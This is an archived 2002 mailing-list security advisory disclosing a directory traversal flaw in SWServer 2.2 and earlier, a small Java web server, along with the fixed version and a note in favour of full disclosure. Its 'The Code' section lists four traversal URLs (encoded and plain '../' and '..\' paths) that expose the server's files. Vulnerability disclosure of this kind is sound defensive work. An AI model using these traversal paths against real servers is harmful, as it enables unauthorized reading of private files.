OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Bugtest (aluigi_at_pivx.com)
Date: Wed Aug 28 2002 - 14:46:58 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ######################################################################

    Auriemma Luigi, PivX security advisory

    Application: SWServer
                 (http://www.geocities.com/tlhome2000/swserver.html)
    Version: 2.2 and previous
    Bug: Directory traversal bug
    Risk (high): An attacker can view and "surf" in the directories of the
                 remote server and view all the files in it.
    Author: Auriemma Luigi, Security Researcher, PivX Solutions, LLC
                 e-mail: aluigipivx.com

    ######################################################################

    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    5) Philosophy

    ______________________________________________________________________

    1) Introduction

    Swserver is a small free webserver totally written in Java.
    It can be considered just like a tiny webserver for tests or for be
    used by single users that don't want to lost their time in
    configuration files.

    ______________________________________________________________________

    2) Bug

    The bug is a directory traversal bug that let the attacker to use the
    remote server like a new read-only drive, all readable with a browser.

    The bad characters that can be used for exploit the vulnerability are
    '\' (%5c) and '/' (%2f).

    ______________________________________________________________________

    3) The Code

    I suggest to try only these links and then follow the directories with
    the browser:

    http://host/%2f%2e%2e%2f
    http://host/%5c%2e%2e%5c
    http://host/..\
    http://host/../

    ______________________________________________________________________

    4) Fix

    SWserver 2.3 from its homepage:

    http://www.geocities.com/tlhome2000/swserver.html

    ______________________________________________________________________

    5) Philosophy

    I'm really hopeful about the FULL-DISCLOSURE policy, because with it
    "everyone" can know the real effects of an attack, the real danger of
    a bug, someone can learn a bit of creative programming (I have learned
    a bit of interesting C from the source code of some published
    exploits under this policy) and it's useful for all the people that
    are hopeful in this type of disclosure.
    No secrets!

    ______________________________________________________________________

    About PivX Solutions
    PivX Solutions, is a premier network security consultancy offering a
    myriad of network security services to our clients, the most notable
    being our proprietary Risk and Vulnerability Assessment (RAVA).
    Dedicated PivX founders have also developed the patented Invisiwall
    network security device which offers the most comprehensive and secure
    intrusion detection system available.

    For more information go to http://www.PivX.com

    Any type of feedback is really welcome!

    Byez

    -- 
    PivX Security Researcher